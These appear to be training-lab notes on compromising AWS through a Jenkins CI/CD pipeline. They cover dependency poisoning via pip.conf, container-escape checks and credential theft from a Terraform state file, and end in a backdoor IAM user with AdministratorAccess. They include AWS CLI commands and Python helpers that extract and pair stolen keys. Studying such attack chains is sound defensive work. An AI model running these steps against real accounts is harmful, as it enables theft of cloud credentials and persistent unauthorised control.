Attacking AWS Cloud Infra

This module details a practical attack scenario demonstrating how to exploit vulnerabilities and misconfigurations within a Continuous Integration/Continuous Delivery (CI/CD) pipeline involving Jenkins and AWS. The goal is to escalate privileges from a vulnerable Jenkins instance to full administrative control over an AWS account, including establishing persistence.

1. Attack Scenario Overview

The module outlines an attack chain that progresses from leaked secrets to a poisoned pipeline, ultimately compromising an AWS environment. The scenario involves:
1. Initial Information Gathering: Discovering Jenkins and associated code repositories.
2. Dependency Chain Attack: Crafting a malicious package that the build agent downloads in place of a legitimate dependency, giving arbitrary code execution inside the build environment.
3. Compromising the Environment: Scanning the network, discovering more services, and tunneling into the automation server (Jenkins).
4. Exploiting Jenkins: Creating an account, exploiting a plugin vulnerability to obtain AWS keys.
5. AWS Key Exploitation: Utilizing stolen AWS keys to access an S3 bucket containing a Terraform state file, which holds administrative AWS keys.
6. Persistence: Creating a backdoor account for long-term access.

2. Key Techniques & Concepts

  • Information Gathering:

    • Jenkins Enumeration: Identifying Jenkins instances and inspecting their configuration, jobs, and connected source repositories, including the infrastructure code they hold (e.g., CloudFormation templates).
    • S3 Bucket Exploration: Discovering and analyzing S3 buckets, especially those serving web applications or storing sensitive files like terraform.tfstate.
    • Source Code Review: Examining Jenkinsfile and other configuration files in repositories for exposed credentials or vulnerable pipeline logic.
  • Dependency Chain Attack / Poisoned Pipeline:

    • Exploiting package manager configurations (e.g., pip.conf) to redirect package downloads to a malicious internal server, leading to code execution within the build environment.
  • Compromising Jenkins:

    • Exploiting Jenkins plugin vulnerabilities to gain initial access or escalate privileges within the Jenkins server.
    • Checking the capabilities of the container a Jenkins agent runs in (cat /proc/1/status | grep Cap) to determine whether it is privileged: the CapEff line is a hex bitmask of PID 1's effective capabilities. Docker's default set shows as 00000000a80425fb, while a container started with --privileged shows the full mask (0000003fffffffff on a kernel with 38 capabilities), which includes CAP_SYS_ADMIN and therefore lets the process mount host block devices and otherwise break out to the host.
  • AWS Key Extraction & Exploitation:

    • Finding AWS API keys embedded directly in application source code (e.g., JavaScript files of an S3 explorer application).
    • Using extracted AWS keys to perform authenticated AWS CLI actions.
    • Accessing S3 buckets that hold infrastructure-as-code state (e.g., terraform.tfstate). Terraform state records every managed resource's attributes as plaintext JSON, so an aws_iam_access_key resource stores the secret key next to its key ID; when the state belongs to an administrative deployment, those are administrator credentials.
  • Privilege Escalation & Persistence:

    • Using the administrator keys recovered from the Terraform state file to create a new IAM user, attach the AWS-managed AdministratorAccess policy to it, generate access keys for it, and store those keys as a named AWS CLI profile.
    • This backdoor user keeps working even if the originally stolen credentials are rotated or revoked. It is also the noisiest step of the chain: IAM user creation and policy attachment are logged by CloudTrail, and a user with AdministratorAccess stands out in any IAM review.
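The pip.conf redirect behind the dependency chain attack above is easiest to understand by looking at one. The following is an added example, not code from the module: it embeds a constructed pip.conf of the kind a poisoned build agent ends up with (the host name pypi.internal.example is an assumption) beside a clean one, and audits both for the settings that redirect package downloads.

```python
"""Audit a pip.conf for index redirection, the poisoned-pipeline indicator.

Added example, not part of the original module. The two configs below are
constructed; "pypi.internal.example" is an assumed host name.
"""
import configparser
from urllib.parse import urlparse

# Constructed pip.conf as found on a redirected build agent. index-url replaces
# PyPI entirely, and trusted-host lets pip talk to it without valid TLS.
POISONED_PIP_CONF = """
[global]
index-url = http://pypi.internal.example:8080/simple
trusted-host = pypi.internal.example
"""

# Constructed pip.conf with no index overrides at all.
CLEAN_PIP_CONF = """
[global]
timeout = 60
"""

# Hosts that a default pip installation talks to.
OFFICIAL_HOSTS = {"pypi.org", "files.pythonhosted.org"}

# Options that change where pip fetches packages from. pip accepts them in
# [global] and in per-command sections such as [install] and [download].
INDEX_OPTIONS = ("index-url", "extra-index-url", "find-links")


def audit_pip_conf(text):
    """Return a list of findings (strings) for the given pip.conf contents."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    findings = []
    for section in cfg.sections():
        for key in INDEX_OPTIONS:
            if not cfg.has_option(section, key):
                continue
            # Multi-valued options are whitespace/newline separated in pip.conf.
            for url in cfg.get(section, key).split():
                parsed = urlparse(url)
                if parsed.scheme == "http":
                    findings.append(f"[{section}] {key} uses plaintext HTTP: {url}")
                if parsed.hostname and parsed.hostname not in OFFICIAL_HOSTS:
                    findings.append(
                        f"[{section}] {key} points at non-PyPI host {parsed.hostname}: {url}"
                    )
                if key == "extra-index-url":
                    # pip takes the highest version from any configured index, so an
                    # extra index can shadow an internal package (dependency confusion).
                    findings.append(f"[{section}] extra-index-url can shadow packages: {url}")
        if cfg.has_option(section, "trusted-host"):
            for host in cfg.get(section, "trusted-host").split():
                findings.append(
                    f"[{section}] trusted-host {host} disables TLS verification for that host"
                )
    return findings


if __name__ == "__main__":
    for label, conf in (("poisoned", POISONED_PIP_CONF), ("clean", CLEAN_PIP_CONF)):
        print(f"{label}:")
        for line in audit_pip_conf(conf) or ["no findings"]:
            print("  " + line)
```

Run it against ~/.config/pip/pip.conf and /etc/pip.conf on a build agent (the user-level file wins, which is why the attacker creates it there). The durable fix on the pipeline side is to pin dependencies with hashes and install with pip install --require-hashes -r requirements.txt, which makes a substituted package fail the hash check whatever index it came from.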
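The privileged-container check above ends with a hex bitmask that has to be decoded to mean anything. The block below is an added example, not from the module: it parses constructed excerpts of grep Cap /proc/1/status (one with Docker's default capability set, one with the full set a --privileged container gets) and reports which capabilities are effective and whether any of them give a route to the host.

```python
"""Decode CapEff from /proc/1/status to tell a privileged container from a default one.

Added example, not from the original module. The two excerpts are constructed;
the masks are Docker's default set and the full set on a 38-capability kernel.
"""
import re

# Linux capability numbers 0..40 in order, as defined in linux/capability.h.
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Capabilities that by themselves give a path from a container to its host.
HOST_ESCAPE_CAPS = {"sys_admin", "sys_module", "sys_rawio", "sys_ptrace", "dac_read_search"}

# docker run --privileged grants every capability the kernel has; any kernel with
# audit_read (bit 37) therefore shows at least these 38 bits set.
FULL_38 = (1 << 38) - 1

# Constructed output of `grep Cap /proc/1/status` in a default Docker container.
DEFAULT_DOCKER_STATUS = """\
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""

# Constructed output of the same command in a --privileged container.
PRIVILEGED_STATUS = """\
CapInh:\t0000000000000000
CapPrm:\t0000003fffffffff
CapEff:\t0000003fffffffff
CapBnd:\t0000003fffffffff
CapAmb:\t0000000000000000
"""


def parse_cap_masks(status_text):
    """Map each Cap* field (CapInh, CapPrm, CapEff, CapBnd, CapAmb) to an int bitmask."""
    masks = {}
    for m in re.finditer(r"^(Cap\w+):\s*([0-9a-fA-F]+)$", status_text, re.M):
        masks[m.group(1)] = int(m.group(2), 16)
    return masks


def decode_caps(mask):
    """Return the names of the capabilities whose bit is set in mask."""
    return [name for i, name in enumerate(CAP_NAMES) if (mask >> i) & 1]


def assess(status_text):
    """Summarise the effective set: names, host-escape caps, and a privileged verdict."""
    eff = parse_cap_masks(status_text)["CapEff"]
    caps = decode_caps(eff)
    return {
        "effective": caps,
        "host_escape": sorted(set(caps) & HOST_ESCAPE_CAPS),
        "privileged": (eff & FULL_38) == FULL_38,
    }


if __name__ == "__main__":
    for label, text in (("default", DEFAULT_DOCKER_STATUS), ("privileged", PRIVILEGED_STATUS)):
        r = assess(text)
        print(f"{label}: {len(r['effective'])} caps, escape={r['host_escape']}, privileged={r['privileged']}")
```

On a live agent, feed it open("/proc/1/status").read() instead of the constructed strings. Even when the verdict is not "privileged", a non-empty host_escape list (for example sys_admin granted with --cap-add) is enough to go after the host.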

3. Tools & Commands

  • **nmcli**: NetworkManager's command-line client, used here to list connection profiles and change the DNS servers assigned to one.

    • nmcli connection modify "Wired connection 1" ipv4.dns "": Clear the manually configured DNS servers on the profile (an empty value removes the override); the profile must be re-activated before the change takes effect.
    • sudo systemctl restart NetworkManager: Restart NetworkManager so the modified profile is re-applied.
  • **aws configure**: Configures AWS CLI credentials and default region.

    • aws configure --profile=<profile-name>: Store a set of keys under a named profile instead of as the default credentials, e.g. aws configure --profile=backdoor for the backdoor user's keys; later commands select the keys with --profile.
  • **aws s3 ls**: Lists contents of an S3 bucket.

    • aws s3 ls staticcontent-lgudbhv8syu2tgbk: List specific bucket contents.
    • aws --profile=stolen-s3 s3 ls tf-state-9b58rezp3vvkf90f: List bucket contents using a specific profile.
  • **aws s3 cp**: Copies files to/from S3 buckets.

    • aws --profile=stolen-s3 s3 cp s3://tf-state-9b58rezp3vvkf90f/terraform.tfstate ./: Copy a Terraform state file to the local directory.
  • **cat** & **grep**: Used for viewing file contents and searching for strings.

    • cat /proc/1/status | grep Cap: Check container capabilities (privileged status).
    • cat -n terraform.tfstate: View contents of a Terraform state file with line numbers.
    • cat -n ~/.config/pip/pip.conf: View pip configuration file.
  • **mkdir -p**: Creates directories, including parent directories if they don't exist.

  • **nano**: Text editor for creating/editing files (e.g., pip.conf).

  • **rm**: Removes files.

    • rm ~/.pypirc: Remove the package upload configuration (read by twine and setuptools when publishing to an index, not by pip itself) created for publishing the crafted package.
    • rm ~/.config/pip/pip.conf: Remove pip's own configuration file, which holds the index-url redirect.
  • **aws iam create-user**: Creates a new IAM user (the backdoor account).

  • **aws iam attach-user-policy**: Attaches a managed policy to a user; attaching arn:aws:iam::aws:policy/AdministratorAccess gives the backdoor user full control of the account.

    • aws --profile backdoor iam list-attached-user-policies --user-name backdoor: Verify which policies are attached to the backdoor user; run with the new user's own profile, this also confirms its keys work.
  • Proxy tools (implied by the scenario; used to tunnel into the automation server):

    • A SOCKS proxy configured in Firefox so the browser can reach the internal Jenkins instance; the setting has to be reverted afterwards (see section 4).
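cat -n terraform.tfstate works for a small state file, but real ones run to thousands of lines. The following is an added example, not code from the module: it embeds a constructed state document (format version 4, using the placeholder key pair from the AWS documentation; the user name, resource names and output are assumptions) and pulls out access key IDs, secrets and other credential-looking values with the JSON path where each was found.

```python
"""Hunt for AWS credentials in a terraform.tfstate pulled from S3.

Added example, not from the original module. SAMPLE_TFSTATE is constructed; the
key pair is the placeholder pair from the AWS documentation, not a real credential.
"""
import json
import re

# Constructed terraform.tfstate of the kind the module copies out of the state bucket.
SAMPLE_TFSTATE = json.dumps({
    "version": 4,
    "terraform_version": "1.5.0",
    "resources": [
        {
            "mode": "managed", "type": "aws_iam_user", "name": "admin",
            "instances": [{"attributes": {
                "name": "tf-admin", "arn": "arn:aws:iam::123456789012:user/tf-admin",
            }}],
        },
        {
            # Terraform stores the secret of an aws_iam_access_key in plaintext
            # unless the resource was created with a pgp_key.
            "mode": "managed", "type": "aws_iam_access_key", "name": "admin_key",
            "instances": [{"attributes": {
                "id": "AKIAIOSFODNN7EXAMPLE",
                "secret": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
                "user": "tf-admin", "status": "Active",
            }}],
        },
        {
            "mode": "managed", "type": "aws_s3_bucket", "name": "state",
            "instances": [{"attributes": {"bucket": "tf-state-9b58rezp3vvkf90f"}}],
        },
    ],
    # Outputs marked sensitive are hidden by `terraform output`, not in the state file.
    "outputs": {"db_password": {"value": "Sup3rS3cret!", "sensitive": True}},
})

# Long-term (AKIA) and temporary (ASIA) access key IDs are 20 characters.
ACCESS_KEY_RE = re.compile(r"(?:AKIA|ASIA)[0-9A-Z]{16}")
# Attribute or output names that usually carry a secret.
SECRET_NAME_HINTS = ("secret", "password", "token", "private_key")


def _walk(node, path=""):
    """Yield (json_path, leaf_value) for every scalar in a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")
    else:
        yield path, node


def find_credentials(state_json):
    """Return (kind, path, value) for every credential-looking string in the state."""
    findings = []
    for path, value in _walk(json.loads(state_json)):
        if not isinstance(value, str):
            continue
        segments = path.replace("[", ".").split(".")
        if ACCESS_KEY_RE.fullmatch(value):
            findings.append(("access_key_id", path, value))
        elif any(hint in seg for seg in segments[-2:] for hint in SECRET_NAME_HINTS):
            findings.append(("secret", path, value))
    return findings


def pair_access_keys(state_json):
    """Pair each aws_iam_access_key instance's key ID with its secret and IAM user."""
    pairs = []
    for res in json.loads(state_json).get("resources", []):
        if res.get("type") != "aws_iam_access_key":
            continue
        for inst in res.get("instances", []):
            attrs = inst.get("attributes", {})
            pairs.append({"user": attrs.get("user"), "id": attrs.get("id"),
                          "secret": attrs.get("secret")})
    return pairs


if __name__ == "__main__":
    for kind, path, value in find_credentials(SAMPLE_TFSTATE):
        print(f"{kind:14} {path}: {value}")
    for pair in pair_access_keys(SAMPLE_TFSTATE):
        print(f"aws configure --profile stolen-admin  # user {pair['user']}, key {pair['id']}")
```

Replace SAMPLE_TFSTATE with open("terraform.tfstate").read() on the downloaded file. pair_access_keys gives the exact id/secret pairs to feed into aws configure under a fresh profile; find_credentials catches the rest (database passwords, tokens in outputs) that a grep for AKIA would miss.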

4. Cleanup & Reversion

  • DNS Settings: If modified (e.g., using nmcli), revert DNS settings to ensure normal network operation.
  • Pip Configuration Files: Remove created ~/.pypirc and ~/.config/pip/pip.conf files to restore default pip behavior.
  • Browser Proxy Settings: Disable any SOCKS proxies configured in web browsers.